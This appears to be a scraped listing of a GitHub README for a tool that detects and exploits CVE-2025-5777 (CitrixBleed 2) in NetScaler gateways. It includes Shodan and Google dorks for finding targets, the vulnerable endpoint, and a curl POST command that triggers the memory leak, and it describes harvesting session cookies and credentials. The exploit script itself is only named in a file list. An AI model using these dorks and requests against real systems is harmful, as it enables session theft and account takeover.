来源

关联漏洞

描述

An advanced, powerful, and easy-to-use tool designed to detect and exploit CVE-2025-5777 (CitrixBleed 2). This script not only identifies the vulnerability but also helps in demonstrating its impact by parsing human-readable information from the memory leak.

介绍

# CVE-2025-5777: The Ultimate Scanner 🚀
![Hacker](https://media.giphy.com/media/LmNwrBhejkK9EFP504/giphy.gif)

---

### 🔐 CVE: `CVE-2025-5777`  
### 🚨 Severity: **Critical**  
### 👨‍💻 Author: `Virendra Kumar & CyberLeelawat`  
### 📜 License: [MIT](./LICENSE)

---

An advanced, powerful, and easy-to-use tool designed to detect and exploit **CVE-2025-5777** (aka **CitrixBleed 2**).  
This script not only identifies the memory leak vulnerability but **demonstrates real-world impact** by parsing sensitive data like session cookies and credentials directly from leaked memory.

---

## 🧠 What is CVE-2025-5777?

`CVE-2025-5777` is a **critical memory leak vulnerability** in **NetScaler (Citrix) ADC and Gateway** products.

> 🧨 It allows unauthenticated, remote attackers to **leak sensitive memory content** like:
- Session cookies (e.g., `NSC_AAAC`)
- Usernames and passwords
- MFA tokens and more

This can result in **full account takeover** without credentials or MFA, making it a **high-impact RCE-level vulnerability**.

---

## ✨ Features

✅ **High-Speed Asynchronous Scanning**  
→ Built with `asyncio` & `aiohttp` to scan targets blazing fast.  

✅ **Intelligent Data Extraction**  
→ Parses **human-readable strings** from leaked memory (like creds, tokens).  

✅ **Sensitive Data Detection**  
→ Detects critical patterns like session cookies and flags high-risk data.  

✅ **Leak Reporting**  
→ Automatically stores leaks into `leaks.txt` for clean offline analysis.  

✅ **PoC + Exploitation Loop**  
→ Supports one-time check or continuous exploitation mode with `--check` flag.  

---

## ⚠️ Disclaimer

> ❗ **This tool is for educational and authorized bug bounty testing only.**  
> ❌ Unauthorized use on systems you don’t own or have permission to test is **illegal**.  
> 🧑‍💻 The author is not responsible for any misuse or damage caused by this tool.

---



## 📚 Official References

- [NIST NVD – CVE-2025-5777](https://nvd.nist.gov/vuln/detail/CVE-2025-5777)
- [Citrix Security Advisory – CTX693420](https://support.citrix.com/article/CTX693420)

---

## 🔍 Shodan Dorks

- http.html:"_ctxstxt_NetscalerAAA" ssl.cert.subject.CN:"target.com" port:6443

- title:"Netscaler Gateway" ssl.cert.subject.CN:"target.com" port:6443

- title:"NetScaler AAA" ssl.cert.subject.CN:"target.com" port:6443

- http.favicon.hash:-1166125415 ssl.cert.subject.CN:"target.com" port:6443

- http.favicon.hash:-1292923998 ssl.cert.subject.CN:"target.com" port:6443


---

## 🔎 Google Dorks

- inurl:/logon/LogonPoint/tmindex.html site:target.com


---

## 🌀 Curl Command

```bash
curl -s -k -X POST "https://target.com/p/u/doAuthentication.do" -d "login"
``` 

Exploit Payload Path
```https://target.com/p/u/doAuthentication.do``` 
Use Burp Suite to capture and manipulate the request.

## 🙏 Credits & Acknowledgements
- Tool Developer: Virendra Kumar & CyberLeelawat
- Original Vulnerability Research: The foundational research and original exploit concepts for this vulnerability were published by security researchers at Watchtwr Labs and others in the community. This tool builds upon their essential work.

---

📜 License
This project is licensed under the MIT License – see the LICENSE file for details.

文件快照

 [4.0K]  /data/pocs/627560a288cd67b1c10d9bda258422de53bc2cee
├── [1.1K]  CVE-2025-5777.bcheck
├── [2.2K]  CVE-2025-5777.yaml
├── [7.6K]  exploitveer.py
├── [1.0K]  LICENSE
└── [3.2K]  README.md

0 directories, 5 files

备注